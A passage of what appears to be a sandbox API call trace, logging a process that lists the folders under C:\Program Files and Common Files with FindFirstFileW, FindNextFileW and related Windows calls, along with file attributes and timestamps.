ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows NT", cAlternateFileName="WINDOW~2")) returned 1 [0042.033] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Photo Viewer", cAlternateFileName="WINDOW~4")) returned 1 [0042.033] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x987bf1ac, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x987bf1ac, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Portable Devices", cAlternateFileName="WIBFE5~1")) returned 1 [0042.033] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xd002dac0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xd002dac0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Sidebar", cAlternateFileName="WI4223~1")) returned 1 [0042.033] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xd002dac0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xd002dac0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Sidebar", cAlternateFileName="WI4223~1")) returned 0 [0042.033] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0042.033] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af284) returned 1 [0042.033] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af290) returned 1 [0042.033] GetFullPathNameW (in: lpFileName="C:\\Program Files\\desktop.ini", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\desktop.ini", lpFilePart=0x0) returned 0x1c [0042.033] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af2c4) returned 1 [0042.033] GetFullPathNameW (in: lpFileName="C:\\Program Files", nBufferLength=0x105, lpBuffer=0x2aedcc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files", lpFilePart=0x0) returned 0x10 [0042.034] GetFullPathNameW (in: lpFileName="C:\\Program Files\\", nBufferLength=0x105, lpBuffer=0x2aeda0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\", lpFilePart=0x0) returned 0x11 [0042.034] FindFirstFileW (in: lpFileName="C:\\Program Files\\*", lpFindFileData=0x2aefec | out: lpFindFileData=0x2aefec*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xd7569640, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xd7569640, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0042.034] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xd7569640, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xd7569640, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.034] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x69da35f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69da35f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Common Files", cAlternateFileName="COMMON~1")) returned 1 [0042.034] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28ae853d, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28ae853d, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28ae853d, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0042.034] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x9ef07a9b, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9ef07a9b, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DVD Maker", cAlternateFileName="DVDMAK~1")) returned 1 [0042.034] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1ead9a68, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ead9a68, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0042.035] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Analysis Services", cAlternateFileName="MICROS~2")) returned 1 [0042.035] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xd0007960, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xd0007960, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Office", cAlternateFileName="MICROS~1")) returned 1 [0042.035] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xcff6f3e0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xcff6f3e0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft SQL Server Compact Edition", cAlternateFileName="MICROS~3")) returned 1 [0042.035] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd0007960, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xd0007960, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Sync Framework", cAlternateFileName="MICROS~4")) returned 1 [0042.035] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x594863b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xcfcc1b20, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xcfcc1b20, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Synchronization Services", cAlternateFileName="MID7C0~1")) returned 1 [0042.035] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSBuild", cAlternateFileName="")) returned 1 [0042.035] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reference Assemblies", cAlternateFileName="REFERE~1")) returned 1 [0042.035] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x4232b3dd, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0xd0007960, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xd0007960, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Uninstall Information", cAlternateFileName="UNINST~1")) returned 1 [0042.036] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Defender", cAlternateFileName="WINDOW~3")) returned 1 [0042.036] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e177d26, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa250a38, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e472dd2, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Journal", cAlternateFileName="WI0FCF~1")) returned 1 [0042.036] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eb25fda, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Mail", cAlternateFileName="WINDOW~1")) returned 1 [0042.036] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ead9a68, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ead9a68, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media Player", cAlternateFileName="WI54FB~1")) returned 1 [0042.036] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows NT", cAlternateFileName="WINDOW~2")) returned 1 [0042.036] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Photo Viewer", cAlternateFileName="WINDOW~4")) returned 1 [0042.036] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x987bf1ac, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x987bf1ac, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Portable Devices", cAlternateFileName="WIBFE5~1")) returned 1 [0042.037] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xd002dac0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xd002dac0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Sidebar", cAlternateFileName="WI4223~1")) returned 1 [0042.037] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0042.037] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0042.037] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af284) returned 1 [0042.037] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af290) returned 1 [0042.037] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\.", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files", lpFilePart=0x0) returned 0x1d [0042.037] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0042.037] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0042.037] CoTaskMemFree (pv=0x4fe370) [0042.037] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0042.037] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files", nBufferLength=0x105, lpBuffer=0x2aedb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files", lpFilePart=0x0) returned 0x1d [0042.037] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af27c) returned 1 [0042.037] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files", lpFilePart=0x0) returned 0x1d [0042.037] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\", nBufferLength=0x105, lpBuffer=0x2aed58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\", lpFilePart=0x0) returned 0x1e [0042.037] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\*", lpFindFileData=0x2aefa4 | out: lpFindFileData=0x2aefa4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x69da35f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69da35f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0042.038] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x69da35f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69da35f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.038] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69da35f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DESIGNER", cAlternateFileName="")) returned 1 [0042.038] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x81afcd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Shared", cAlternateFileName="MICROS~1")) returned 1 [0042.038] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services", cAlternateFileName="")) returned 1 [0042.038] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SpeechEngines", cAlternateFileName="SPEECH~1")) returned 1 [0042.039] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System", cAlternateFileName="")) returned 1 [0042.039] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System", cAlternateFileName="")) returned 0 [0042.039] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0042.039] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af23c) returned 1 [0042.039] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af248) returned 1 [0042.039] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af27c) returned 1 [0042.039] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files", lpFilePart=0x0) returned 0x1d [0042.039] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\", nBufferLength=0x105, lpBuffer=0x2aed58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\", lpFilePart=0x0) returned 0x1e [0042.039] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\*", lpFindFileData=0x2aefa4 | out: lpFindFileData=0x2aefa4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x69da35f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69da35f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0042.039] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x69da35f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69da35f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.040] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69da35f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DESIGNER", cAlternateFileName="")) returned 1 [0042.040] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x81afcd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Shared", cAlternateFileName="MICROS~1")) returned 1 [0042.040] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services", cAlternateFileName="")) returned 1 [0042.040] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: 